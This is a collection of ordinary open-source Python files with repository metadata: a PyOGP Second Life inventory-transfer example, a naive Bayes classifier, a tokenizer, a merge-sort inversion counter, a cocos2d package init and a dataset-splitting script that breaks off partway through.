5234e461f3a500afc3ae3ee0cd58ee11938d3f1f
|
caa8b60f3f2bbc43220fa80c2663a8a84b95368f
|
/pyogp/apps/examples/inventory_transfer.py
|
b0c30d596b6e3fb8e673ef4446009cb461e7a0e5
|
[
"Apache-2.0"
] |
permissive
|
grobertson/PyOGP.Apps
|
fb1ac597eb3042c7352a08d033e84ab31b2ffaeb
|
03583baa8d3a2438b0d0a5452ee8c9e56aace9fd
|
refs/heads/master
| 2020-03-28T18:47:17.308284
| 2010-02-09T23:19:32
| 2010-02-09T23:19:32
| 148,911,566
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,205
|
py
|
# standard
import re
import getpass, sys, logging
from optparse import OptionParser
import time
# related
from eventlet import api
# pyogp
from pyogp.lib.client.agent import Agent
from pyogp.lib.client.agentmanager import AgentManager
from pyogp.lib.client.settings import Settings
from pyogp.lib.base.helpers import Wait
def login():
""" login an to a login endpoint """
parser = OptionParser(usage="usage: %prog --file filename [options]")
logger = logging.getLogger("client.example")
parser.add_option("-l", "--loginuri", dest="loginuri", default="https://login.aditi.lindenlab.com/cgi-bin/login.cgi",
help="specified the target loginuri")
parser.add_option("-r", "--region", dest="region", default=None,
help="specifies the region (regionname/x/y/z) to connect to")
parser.add_option("-q", "--quiet", dest="verbose", default=True, action="store_false",
help="enable verbose mode")
parser.add_option("-f", "--file", dest="file", default=None, help="csv formatted file containing first,last,pass for multi agent login (required)")
parser.add_option("-c", "--count", dest="count", default=0, help="number of agents to login")
parser.add_option("-s", "--search", dest="search", default=None, help = "name of inventory item to search for and transfer to account number 2")
(options, args) = parser.parse_args()
options.count = int(options.count)
if len(args) > 0:
parser.error("Unsupported arguments specified: " + str(args))
if options.file == None:
parser.error("Missing required -f argument for logging in multiple agents")
try:
f = open(options.file, 'r')
data = f.readlines()
f.close()
except IOError, error:
print 'File not found. Stopping. Error: %s' % (error)
return
clients = []
line_count = 0
for line in data:
line_count += 1
if options.count > 0:
if options.count > line_count:
print "The count parameter requests more agents (%s) than you have in your data file (%s). Logging in max available." % (options.count, line_count)
counter = 0
for line in data:
counter += 1
if len(line.strip().split(',')) != 3:
print 'We expect a line with 3 comma separated parameters, we got %s' % (line.strip().split(','))
print 'Stopping.'
clients.append(line.strip().split(','))
if counter >= options.count:
break
if options.verbose:
console = logging.StreamHandler()
console.setLevel(logging.DEBUG) # seems to be a no op, set it for the logger
formatter = logging.Formatter('%(asctime)-30s%(name)-30s: %(levelname)-8s %(message)s')
console.setFormatter(formatter)
logging.getLogger('').addHandler(console)
# setting the level for the handler above seems to be a no-op
# it needs to be set for the logger, here the root logger
# otherwise it is NOTSET(=0) which means to log nothing.
logging.getLogger('').setLevel(logging.DEBUG)
else:
print "Attention: This script will print nothing if you use -q. So it might be boring to use it like that ;-)"
# prep instance settings
settings = Settings()
settings.ENABLE_INVENTORY_MANAGEMENT = True
settings.ENABLE_COMMUNICATIONS_TRACKING = False
settings.ENABLE_OBJECT_TRACKING = False
settings.ENABLE_UDP_LOGGING =True
settings.ENABLE_EQ_LOGGING = True
settings.ENABLE_CAPS_LOGGING = True
settings.MULTIPLE_SIM_CONNECTIONS = False
settings.ACCEPT_INVENTORY_OFFERS = True
agents = []
# Now let's prime the accounts for login
for params in clients:
#First, initialize the agent
agents.append(Agent(settings, params[0], params[1], params[2]))
agentmanager = AgentManager()
agentmanager.initialize(agents)
#print 'Storing agents:'
#for agent in agentmanager.agents:
#print '\t' + agentmanager.agents[agent].Name()
# log them in
for key in agentmanager.agents:
agentmanager.login(key, options.loginuri, options.region)
############ WORKING HERE
# allow 10 seconds for agents to connect
Wait(10)
giver = None
receiver = None
keys = agentmanager.agents.keys()
giver = agentmanager.agents[keys[0]]
receiver = agentmanager.agents[keys[1]]
print ''
print ''
print ''
print ''
print 'Agent giving inventory is: %s' % (giver)
print 'Agent receiving inventory is: %s' % (receiver)
print ''
print ''
print ''
print ''
# for folders whose parent = root folder aka My Inventory, request their contents
[giver.inventory._request_folder_contents(folder.FolderID) for folder in giver.inventory.folders if folder.ParentID == giver.inventory.inventory_root.FolderID]
#while client.running:
#api.sleep(0)
# next, let's wait 5 seconds and FetchInventory for items we know about
Wait(10)
if options.search != None:
# and next, let's search the inventory by name
matches = giver.inventory.search_inventory(name = options.search)
# now, if we have a match, let's try and rez the first matching object
item_to_give = matches[0]
print ''
print ''
print ''
print ''
print "Found item to give to another agent: %s" % (str(item_to_give.__dict__))
print ''
print ''
print ''
print ''
giver.inventory.give_inventory(item_to_give.ItemID, receiver.agent_id)
while agentmanager.has_agents_running():
api.sleep(0)
def main():
return login()
if __name__=="__main__":
main()
"""
Contributors can be viewed at:
http://svn.secondlife.com/svn/linden/projects/2008/pyogp/CONTRIBUTORS.txt
$LicenseInfo:firstyear=2008&license=apachev2$
Copyright 2009, Linden Research, Inc.
Licensed under the Apache License, Version 2.0 (the "License").
You may obtain a copy of the License at:
http://www.apache.org/licenses/LICENSE-2.0
or in
http://svn.secondlife.com/svn/linden/projects/2008/pyogp/LICENSE.txt
$/LicenseInfo$
"""
|
[
"enus@lindenlab.com"
] |
enus@lindenlab.com
|
558e6dc5b86f48f3be3389deb18431743181d8c5
|
b92fa9d959a88967cb39ce4021e92958bf630eaa
|
/NaiveBayes.py
|
d027ca1045fa11bbb1a8f3b7685579a2ee584a6c
|
[] |
no_license
|
rishabhzn200/NaiveBayes
|
d8e1e4b421aefa5ac62f5e5782825d9127bcc92f
|
97e7b7fa247b2534563ed8c3aaaf4144675e1453
|
refs/heads/master
| 2021-07-07T00:07:06.347172
| 2017-10-02T08:30:01
| 2017-10-02T08:30:01
| 105,513,137
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,829
|
py
|
import math
class NaiveBayes:
def __init__(self):
pass
    def mean(self, data):
        return sum(data) / float(len(data))
    def stddev(self, data):
        average = self.mean(data)
        variance = sum(pow(d - average, 2) for d in data) / float(len(data) - 1)
        return math.sqrt(variance)
    # The input dataset holds rows of attributes belonging to a single class.
    # Compute the mean and standard deviation for every attribute and return them.
def findMeanStddev(self, dataset):
mean_stddev = [ (self.mean(attr), self.stddev(attr)) for attr in zip(*dataset)]
del mean_stddev[-1] #to remove mean and stddev of class labels
return mean_stddev
def splitDataByClass(self, datasetToBeSplitByClass):
dataByClass = {}
for i in range(datasetToBeSplitByClass.__len__()):
rowData = datasetToBeSplitByClass[i]
classLabel = rowData[-1]
if classLabel not in dataByClass:
dataByClass[classLabel] = []
dataByClass[classLabel].append(rowData)
return dataByClass
def createModel(self, dataset):
#Get dictionary with class labels as keys and other attributes list as values using splitDataByClass
classDict = self.splitDataByClass(dataset)
model = {} # used to store mean and standard deviation for each classLabel
        for classLabel, values in classDict.items():
#values has data corresponding to classLabel. This data is row of list of attributes
model[classLabel] = self.findMeanStddev(values)
#model has tuple of mean and standard deviation for all the attributes and all class labels.
return model
def calculateProbability(self, data, mean, stddev):
exp = math.exp(-(math.pow(data - mean , 2) / (2 * math.pow(stddev, 2))))
return (1 / (math.sqrt(2 * math.pi) * stddev)) * exp
    # For each test row, calculate the per-class probabilities.
    # data is one row of test data with all of its attributes.
    # model maps each class label to a list of (mean, stddev) tuples, one per attribute.
    # This function assumes conditional independence among the attributes (Naive Bayes).
def calculateClassProbabilities(self, model, data): # list of tuples of mean and stddev
classProbabilities = {}
        for classLabel, values in model.items():
classProbabilities[classLabel] = 1
for index in range(values.__len__()): # run till number of attributes
mean, stddev = values[index]
dataX = data[index]
classProbabilities[classLabel] = classProbabilities[classLabel] * self.calculateProbability(dataX, mean, stddev)
return classProbabilities
def predict(self, model, data):
classProbabilities = self.calculateClassProbabilities(model, data)
predictedLabel = None
predProbability = -1
        for classLabel, prob in classProbabilities.items():
if predictedLabel is None or prob > predProbability:
predictedLabel = classLabel
predProbability = prob
return predictedLabel
def getPredictions(self, model, testData):
predictedLabels = []
for index in range(len(testData)):
result = self.predict(model, testData[index])
predictedLabels.append(result)
return predictedLabels
def getAccuracy(self, testData, predictions):
correctVal = 0
for index in range(len(testData)):
if testData[index][-1] == predictions[index]:
correctVal += 1
return (correctVal / float(len(testData))) * 100
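# Editor's addition: a minimal end-to-end sketch on a toy dataset whose rows
# are [attribute..., class_label]; the numbers are illustrative only.
if __name__ == '__main__':
    train = [
        [1.0, 20.0, 0],
        [2.0, 21.0, 0],
        [8.0, 30.0, 1],
        [9.0, 31.0, 1],
    ]
    nb = NaiveBayes()
    model = nb.createModel(train)
    print(nb.predict(model, [1.5, 20.5]))  # expected: 0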
|
[
"rishabh.zn200@gmail.com"
] |
rishabh.zn200@gmail.com
|
12b858ee18a0ba1b6ccd398cd6dac9011d70ce92
|
ff7dcf446ad392a884ee87759a6753403962eaf2
|
/tools/itools.py
|
8e807af7a65dbed4e24d732315e884b3cd117357
|
[] |
no_license
|
alexzt0131/xiaoan
|
9505b141ebbcade40b447fb1cb2d769147aa816e
|
380b74abcb68dc1d1070cc36792557fb93df34ad
|
refs/heads/master
| 2020-04-01T15:04:30.644948
| 2018-10-20T12:49:29
| 2018-10-20T12:49:29
| 153,319,836
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,173
|
py
|
import datetime
import os
from django.shortcuts import render
class itools():
def retrive(rootdir=''):
'''
#遍历特定文件夹内文件名
'''
ret = {
'files': None
}
# rootdir = 'static/images' # 指明被遍历的文件夹
for parent, dirnames, file_names in os.walk(rootdir):
ret['files'] = file_names
        # for parent, dirnames, filenames in os.walk(rootdir):  # yields three values per directory: 1. parent dir 2. subdirectory names (no path) 3. file names
        #     # for dirname in dirnames:  # print folder info
        #     #     print("parent is:" + parent)
        #     #     print("dirname is" + dirname)
        #     print(filenames)
        #     for filename in filenames:  # print file info
        #
        #         # print("parent is:" + parent)
        #         print("in retrive_filename is:" + filename)
        #
        #         # full_path = os.path.join(parent, filename)  # build the full file path
return ret
def getCurrentDateTime(self=None):
return datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
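# --- Editor's note: hedged usage sketch ---
# retrive() takes no `self`, so in practice it behaves like a static method and
# is called through the class:
#
#   files = itools.retrive('static/images')['files']
#   stamp = itools.getCurrentDateTime()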
|
[
"110021341@qq.com"
] |
110021341@qq.com
|
e844e04c3112f7239f8d53d89308b0d3ad515141
|
5efcbdd65e3e86251dd70dafb69720d623fa0f52
|
/dialogue/tokenizer.py
|
adb693c0ae08a5f9bd25c3de25f2ef916ffc273e
|
[
"Apache-2.0"
] |
permissive
|
xiejinwen113/nlp-dialogue
|
d39ffa0ccf331746f07d05f0904a2907f25c1336
|
51558c32c52f244bb2dd5a52b7dbeb482cf813e6
|
refs/heads/main
| 2023-08-01T11:46:48.825654
| 2021-09-08T16:10:35
| 2021-09-08T16:10:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,510
|
py
|
#! -*- coding: utf-8 -*-
""" 文本分词工具及Tokenizer
"""
# Author: DengBoCong <bocongdeng@gmail.com>
#
# License: Apache-2.0 License
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import numpy as np
import os
from collections import defaultdict
from collections import OrderedDict
class Tokenizer(object):
""" 文本分词工具及Tokenizer
"""
def __init__(self, num_words=None, filters='!"#$%&()*+,-./:;<=>?@[\\]^_`{|}~\t\n', lower=True,
split=' ', char_level=False, oov_token=None, document_count=0) -> None:
"""
        :param num_words: maximum number of tokens to keep, ranked by frequency
        :param filters: characters to filter out; defaults to all punctuation, tabs, newlines, etc.
        :param lower: whether to lowercase the text
        :param split: separator to split on
        :param char_level: whether to treat each character as a token
        :param oov_token: out-of-vocabulary token
        :param document_count: total number of documents
"""
self.word_counts = OrderedDict()
self.word_docs = defaultdict(int)
self.filters = filters
self.split = split
self.lower = lower
self.num_words = num_words
self.document_count = document_count
self.char_level = char_level
self.oov_token = oov_token
self.index_docs = defaultdict(int)
self.word_index = {}
self.index_word = {}
def fit_on_texts(self, texts: list) -> None:
""" 更新内部词汇表
:param texts: 文本列表
:return: 转换后的seq
"""
for text in texts:
self.document_count += 1
if self.char_level or isinstance(text, list):
if self.lower:
if isinstance(text, list):
text = [text_elem.lower() for text_elem in text]
else:
text = text.lower()
seq = text
else:
seq = text_to_word_sequence(text, filters=self.filters, lower=self.lower, split=self.split)
for w in seq:
if w in self.word_counts:
self.word_counts[w] += 1
else:
self.word_counts[w] = 1
for w in set(seq):
                # count the number of documents each token appears in
self.word_docs[w] += 1
wcounts = list(self.word_counts.items())
wcounts.sort(key=lambda x: x[1], reverse=True)
        # place the OOV token at the head of the vocabulary
if self.oov_token is None:
sorted_voc = []
else:
sorted_voc = [self.oov_token]
sorted_voc.extend(wc[0] for wc in wcounts)
        # index 0 is reserved
self.word_index = dict(zip(sorted_voc, list(range(1, len(sorted_voc) + 1))))
self.index_word = {c: w for w, c in self.word_index.items()}
for w, c in list(self.word_docs.items()):
self.index_docs[self.word_index[w]] = c
def texts_to_sequences(self, texts) -> list:
""" 将文本序列转化为token序列,注意了,只有前
num_words个token才会被转换,其余转换为oov_token词
:param texts: 文本列表
:return: 转换后的seq
"""
return list(self.texts_to_sequences_generator(texts))
def texts_to_sequences_generator(self, texts):
""" 将文本序列转化为token序列的生成器
"""
num_words = self.num_words
oov_token_index = self.word_index.get(self.oov_token)
for text in texts:
if self.char_level or isinstance(text, list):
if self.lower:
if isinstance(text, list):
text = [text_elem.lower() for text_elem in text]
else:
text = text.lower()
seq = text
else:
seq = text_to_word_sequence(text, filters=self.filters, lower=self.lower, split=self.split)
vect = []
for w in seq:
i = self.word_index.get(w)
if i is not None:
if num_words and i >= num_words:
if oov_token_index is not None:
vect.append(oov_token_index)
else:
vect.append(i)
elif self.oov_token is not None:
vect.append(oov_token_index)
yield vect
def sequences_to_texts(self, sequences) -> list:
""" 将token序列转化为文本序列的生成器
:param sequences: token序列
:return: 转换后的文本序列
"""
return list(self.sequences_to_texts_generator(sequences))
def sequences_to_texts_generator(self, sequences):
""" 将token序列转化为文本序列,注意了,只有前
num_words个token才会被转换,其余转换为token词
:param sequences: token序列
:return: 转换后的文本序列
"""
num_words = self.num_words
oov_token_index = self.word_index.get(self.oov_token)
for seq in sequences:
vect = []
for num in seq:
word = self.index_word.get(num)
if word is not None:
if num_words and num >= num_words:
if oov_token_index is not None:
vect.append(self.index_word[oov_token_index])
else:
vect.append(word)
elif self.oov_token is not None:
vect.append(self.index_word[oov_token_index])
vect = ' '.join(vect)
yield vect
def get_config(self) -> dict:
""" 获取分词器的配置字典 """
json_word_counts = json.dumps(self.word_counts)
json_word_docs = json.dumps(self.word_docs)
json_index_docs = json.dumps(self.index_docs)
json_word_index = json.dumps(self.word_index)
json_index_word = json.dumps(self.index_word)
return {
'num_words': self.num_words,
'filters': self.filters,
'lower': self.lower,
'split': self.split,
'char_level': self.char_level,
'oov_token': self.oov_token,
'document_count': self.document_count,
'word_counts': json_word_counts,
'word_docs': json_word_docs,
'index_docs': json_index_docs,
'index_word': json_index_word,
'word_index': json_word_index
}
def to_json(self, **kwargs) -> str:
""" 将分词器相关数据转化为json格式返回
"""
config = self.get_config()
tokenizer_config = {
'class_name': self.__class__.__name__,
'configs': config
}
return json.dumps(tokenizer_config, **kwargs)
def text_to_word_sequence(text, filters='!"#$%&()*+,-./:;<=>?@[\\]^_`{|}~\t\n', lower=True, split=" ") -> list:
""" 讲文本转换成token序列
:param text: 文本列表
:param filters: 过滤规则, 默认过滤所有标点符号、制表符、换行符等
:param lower: 是否将文本转换为小写
:param split: 分隔符
"""
if lower:
text = text.lower()
translate_dict = {c: split for c in filters}
translate_map = str.maketrans(translate_dict)
text = text.translate(translate_map)
seq = text.split(split)
return [i for i in seq if i]
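# Illustrative example (not in the original module):
# text_to_word_sequence("Hello, World! Hello.") -> ['hello', 'world', 'hello']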
def pad_sequences(sequences, max_len=None, dtype='int32',
padding='pre', truncating='pre', value=0.) -> np.ndarray:
""" 填充序列,如果未指定最大长度,则默认使用序列中最长长度
:param sequences: 需要填充的序列
:param max_len: 最大长度
:param dtype: 输出类型
:param padding: 填充类型,pre在前,post在后
:param truncating: 截断类型,pre在前,post在后
:param value: 填充值类型,float或者是string
:return: 形状为(len(sequences), max_len)的numpy数组
"""
if not hasattr(sequences, '__len__'):
raise ValueError('`sequences` must be iterable.')
num_samples = len(sequences)
lengths = []
sample_shape = ()
flag = True
for x in sequences:
try:
lengths.append(len(x))
if flag and len(x):
sample_shape = np.asarray(x).shape[1:]
flag = False
except TypeError:
raise ValueError('`sequences` must be a list of iterables. '
'Found non-iterable: ' + str(x))
if max_len is None:
max_len = np.max(lengths)
is_dtype_str = np.issubdtype(dtype, np.str_) or np.issubdtype(dtype, np.unicode_)
if isinstance(value, str) and dtype != object and not is_dtype_str:
raise ValueError("`dtype` {} is not compatible with `value`'s type: {}\n"
"You should set `dtype=object` for variable length strings."
.format(dtype, type(value)))
x = np.full((num_samples, max_len) + sample_shape, value, dtype=dtype)
for idx, s in enumerate(sequences):
if not len(s):
continue
if truncating == 'pre':
trunc = s[-max_len:]
elif truncating == 'post':
trunc = s[:max_len]
else:
raise ValueError('Truncating type "%s" '
'not understood' % truncating)
trunc = np.asarray(trunc, dtype=dtype)
if trunc.shape[1:] != sample_shape:
raise ValueError('Shape of sample %s of sequence at position %s '
'is different from expected shape %s' %
(trunc.shape[1:], idx, sample_shape))
if padding == 'post':
x[idx, :len(trunc)] = trunc
elif padding == 'pre':
x[idx, -len(trunc):] = trunc
else:
raise ValueError('Padding type "%s" not understood' % padding)
return x
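# Illustrative example (not in the original module): with the default
# 'pre' padding, shorter sequences are filled with zeros at the front:
# pad_sequences([[1, 2, 3], [4, 5]], max_len=4)
# -> array([[0, 1, 2, 3],
#           [0, 0, 4, 5]], dtype=int32)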
def tokenizer_from_json(json_string) -> Tokenizer:
""" 将Tokenizer序列化的json转化为Tokenizer实例
:param json_string: json字符串
:return: 分词器
"""
tokenizer_config = json.loads(json_string)
config = tokenizer_config.get('configs')
word_counts = json.loads(config.pop('word_counts'))
word_docs = json.loads(config.pop('word_docs'))
index_docs = json.loads(config.pop('index_docs'))
index_docs = {int(k): v for k, v in index_docs.items()}
index_word = json.loads(config.pop('index_word'))
index_word = {int(k): v for k, v in index_word.items()}
word_index = json.loads(config.pop('word_index'))
tokenizer = Tokenizer(**config)
tokenizer.word_counts = word_counts
tokenizer.word_docs = word_docs
tokenizer.index_docs = index_docs
tokenizer.word_index = word_index
tokenizer.index_word = index_word
return tokenizer
def load_tokenizer(dict_path: str) -> Tokenizer:
""" 通过字典加载tokenizer
:param dict_path: 字典路径
:return tokenizer: 分词器
"""
if not os.path.exists(dict_path):
print("字典不存在,请检查之后重试")
exit(0)
with open(dict_path, "r", encoding="utf-8") as dict_file:
json_string = dict_file.read().strip().strip("\n")
tokenizer = tokenizer_from_json(json_string)
return tokenizer
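# --- Illustrative usage sketch (not part of the original module) ---
# A minimal round trip under the APIs defined above: fit a tokenizer,
# encode the texts, pad them, then restore the tokenizer from JSON.
if __name__ == "__main__":
    corpus = ["hello world", "hello dialogue system"]
    tok = Tokenizer(oov_token="<unk>")
    tok.fit_on_texts(corpus)
    seqs = tok.texts_to_sequences(corpus)    # e.g. [[2, 3], [2, 4, 5]]
    padded = pad_sequences(seqs, max_len=4)  # shape (2, 4), zero-padded in front
    restored = tokenizer_from_json(tok.to_json())
    assert restored.texts_to_sequences(corpus) == seqs
    print(seqs, padded.shape)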
|
[
"1210212670@qq.com"
] |
1210212670@qq.com
|
7e7ac221c2fb863293cae9ff284aabecf06ef066
|
5fa6053e57e4ce18f8669ac5fc88adf981b9d440
|
/zad13.py
|
c42ff0ae799a38493b41a04e3c4317d05778c9b9
|
[] |
no_license
|
olkiszova/python_kurs_16.03.19
|
0a6994cd32bf2b696a6666d4bb76bf8d4770a8a0
|
23be0391f8ab3b825c0d20a4cdb7040352a6d4a9
|
refs/heads/master
| 2020-05-03T09:36:58.760353
| 2019-06-08T21:47:15
| 2019-06-08T21:47:15
| 178,558,924
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 509
|
py
|
#i = 0
#suma_temperatur = 0
#while i != 7:
#    suma_temperatur += float(input("Enter temperature: "))
#    i = i + 1  # i += 1
#    print(i, suma_temperatur)
#print("Average: ", suma_temperatur, i, suma_temperatur/i)
i = 0
suma_temperatur = 0
while True:
    komenda = input("Enter a temperature or type [k] to finish: ")
    if komenda == 'k':
        break
    suma_temperatur += float(komenda)
    i = i + 1
    print(i, suma_temperatur)
print("Average", suma_temperatur, i, suma_temperatur/i)
|
[
"tomczyk.aleksandra12@gmail.com"
] |
tomczyk.aleksandra12@gmail.com
|
28be6b06513d0f7b37d4bd20256ca3e424177d80
|
0466559817d3a1be9409da2c83db99c4db3bacfe
|
/hubcheck/pageobjects/widgets/ticket_content.py
|
7cb8b32251cdd0a4d4a1efb280dfcbd8869a58c3
|
[
"MIT"
] |
permissive
|
ken2190/hubcheck
|
955cf9b75a1ee77e28256dfd3a780cfbc17de961
|
2ff506eb56ba00f035300862f8848e4168452a17
|
refs/heads/master
| 2023-03-20T15:17:12.949715
| 2015-09-29T16:11:18
| 2015-09-29T16:11:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,146
|
py
|
from hubcheck.pageobjects.widgets.ticket_comment_base import TicketCommentBase
class TicketContent(TicketCommentBase):
def __init__(self, owner, locatordict={}):
super(TicketContent,self).__init__(owner,locatordict)
# load hub's classes
TicketContent_Locators = self.load_class('TicketContent_Locators')
# update this object's locator
self.locators.update(TicketContent_Locators.locators)
# update the locators with those from the owner
self.update_locators_from_owner()
# update the component's locators with this objects overrides
self._updateLocators()
class TicketContent_Locators_Base_1(object):
"""locators for TicketContent object"""
locators = {
'base' : "css=.ticket",
'commenter' : "css=.ticket-title strong a",
'body' : "css=.ticket-content p:nth-of-type(2)",
}
class TicketContent_Locators_Base_2(object):
"""locators for TicketContent object"""
locators = {
'base' : "css=.ticket",
'commenter' : "css=.entry-title strong a",
'body' : "css=.entry-body",
}
|
[
"telldsk@gmail.com"
] |
telldsk@gmail.com
|
d0a7df11a0005fcb97be5760df887d2e47efea9e
|
937010ba3936b389eb128b05849afe8a8a76a9ff
|
/week2/sort_and_coint.py
|
c9818017268c168058446e34535bc11a1d0e7067
|
[] |
no_license
|
maglili/coursera_algo_c1
|
6ae50bcb09cf9385ced42dd6052ab121a3de16c6
|
3fb2af1d3d1352daf0a1c567c368887331cb3e36
|
refs/heads/main
| 2023-08-22T02:56:50.389126
| 2021-10-20T04:03:20
| 2021-10-20T04:03:20
| 391,672,270
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,270
|
py
|
def sort_and_count(array, length):
"""
    Sort the given list and count its inversions.
"""
# base case
if length == 1:
return array, 0
# recursive
else:
# sort
n = round(length / 2)
B, X = sort_and_count(array[:n], n)
C, Y = sort_and_count(array[n:], length - n)
# merge
i = j = 0
count = 0
sorted_list = []
for _ in range(length):
# avoid out of index
if i == len(B):
sorted_list += C[j:]
break
elif j == len(C):
sorted_list += B[i:]
break
if B[i] < C[j]:
sorted_list.append(B[i])
i += 1
else:
sorted_list.append(C[j])
j += 1
count += len(B[i:])
return sorted_list, count + X + Y
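# Illustrative example (not in the original file):
# sort_and_count([3, 1, 2], 3) -> ([1, 2, 3], 2)
# (the two inversions are the pairs (3, 1) and (3, 2))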
if __name__ == "__main__":
import time
with open("IntegerArray.txt", encoding="utf-8") as fh:
input_array = []
for row in fh:
input_array.append(int(row))
# input_array = [8,7,6,5,4,3,2,1]
start = time.time()
_, ans = sort_and_count(input_array, len(input_array))
print("ans:", ans)
print("time:", time.time() - start)
|
[
"gibson870811@gmail.com"
] |
gibson870811@gmail.com
|
a2d5d4b1433196b40ed1c08abd1bf53971bcc7db
|
6b85714401cfe9634da8cbd84bfc2c54b45a85a1
|
/chivySources/cocos/__init__.py
|
2c7864e8c5203d98d429fe60e85fe736165b8855
|
[] |
no_license
|
sapal/chivy
|
4c4f2a80968a663b6f048631a30a3cf2369a4aff
|
e75bfae289bc0c367764be84abc9978528840f75
|
refs/heads/master
| 2021-01-21T16:11:01.900261
| 2017-05-20T09:52:10
| 2017-05-20T09:52:10
| 91,880,164
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,805
|
py
|
# ----------------------------------------------------------------------------
# cocos2d
# Copyright (c) 2008-2010 Daniel Moisset, Ricardo Quesada, Rayentray Tappa,
# Lucio Torre
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of cocos2d nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''cocos2d
cocos2d is a framework for building 2D games, demos, and other graphical/interactive applications.
Main Features:
--------------
* Flow control: Manage the flow control between different scenes in an easy way
* Sprites: Fast and easy sprites
* Actions: Just tell sprites what you want them to do. Composable actions like move, rotate, scale and much more
* Effects: Effects like waves, twirl, lens and much more
* Tiled Maps: Support for rectangular and hexagonal tiled maps
* Transitions: Move from scene to scene with style
* Menus: Built in classes to create menus
* Text Rendering: Label and HTMLLabel with action support
* Documentation: Programming Guide + API Reference + Video Tutorials + Lots of simple tests showing how to use it
* Built-in Python Interpreter: For debugging purposes
* BSD License: Just use it
* Pyglet Based: No external dependencies
* OpenGL Based: Hardware Acceleration
http://cocos2d.org
'''
__docformat__ = 'restructuredtext'
__version__ = "0.4rc0"
__author__ = "cocos2d team"
version = __version__
import sys
# add the cocos resources path
import os, pyglet
#pyglet.resource.path.append(
# os.path.join(os.path.dirname(os.path.realpath(__file__)), "resources")
# )
#pyglet.resource.reindex()
try:
unittesting = os.environ['cocos_utest']
except KeyError:
unittesting = False
del os, pyglet
# in windows we use the pygame package to get the SDL dlls
# we must get the path here because the inner pygame module will hide the real
if sys.platform == 'win32':
import imp
try:
dummy, sdl_lib_path, dummy = imp.find_module('pygame')
del dummy
except ImportError:
sdl_lib_path = None
def import_all():
import actions
import director
import layer
import menu
import sprite
import path
import scene
import grid
import text
import camera
import draw
import skeleton
import rect
import tiles
if not unittesting:
import_all()
|
[
"sapalskimichal@gmail.com"
] |
sapalskimichal@gmail.com
|
a0fb4934cdfbb3fc71d1a7e31b7ec24409a53dbf
|
1eeb22ad92df76688a8a33d8f132eaef183b49ca
|
/analysis/split_train_dev_test_set.py
|
851c695559ceb775863fea09ec1aa1b1182e4ab7
|
[
"MIT"
] |
permissive
|
viig99/mixmatch-freesound
|
6154a739cd6684ea983a600b6e74929712075c72
|
2abe33c1c08206b0bbbc2e324a529c6a5cca140b
|
refs/heads/master
| 2020-05-30T11:00:53.789434
| 2019-06-20T10:35:08
| 2019-06-20T10:35:08
| 189,687,292
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,391
|
py
|
import random
from random import sample
from shutil import copyfile
random.seed(9)
base_dir = '/home/gpu_user/newdisk2/hari/data/freesound/'
train_set = 'train_curated'
train_dir = base_dir + train_set + '/'
train_csv = base_dir + train_set + '.csv'
output_csv_train = train_csv + '_train'
output_csv_dev = train_csv + '_dev'
output_csv_test = train_csv + '_test'
output_base_dir = base_dir + 'split_train_curated/'
audio_train = output_base_dir + 'train/'
audio_dev = output_base_dir + 'dev/'
audio_test = output_base_dir + 'test/'
lines = open(train_csv).readlines()
lines = [line.strip() for line in lines]
header = lines[0]
lines = lines[1:]
bad_audio_files = ['f76181c4.wav', '77b925c2.wav', '6a1f682a.wav', 'c7db12aa.wav', '7752cc8a.wav', '1d44b0bd.wav']
assert lines[0].split(',')[0].endswith('.wav')
print(lines[0].split(',')[0].strip())
line_cnt_before_filter = len(lines)
lines = [line for line in lines if line.split(',')[0].strip() not in bad_audio_files]
line_cnt_after_filter = len(lines)
print(line_cnt_before_filter, len(bad_audio_files), line_cnt_after_filter)
assert line_cnt_before_filter - len(bad_audio_files) == line_cnt_after_filter
random.shuffle(lines)
train_prop, dev_prop, test_prop = 0.9, 0.05, 0.05
train_set_size = int(len(lines)*train_prop)
dev_set_size = int(len(lines)*dev_prop)
train_lines = lines[:train_set_size]
dev_lines = lines[train_set_size:(train_set_size + dev_set_size)]
test_lines = lines[(train_set_size + dev_set_size):]
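# e.g. with 100 kept lines this yields 90 train / 5 dev / 5 test; the test
# split absorbs any rounding remainder (illustrative note, not original code)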
def create_set(output_csv, lines_sample, output_audio_dir):
audio_set = set()
with open(output_csv, 'w') as ofp:
ofp.write(header + '\n')
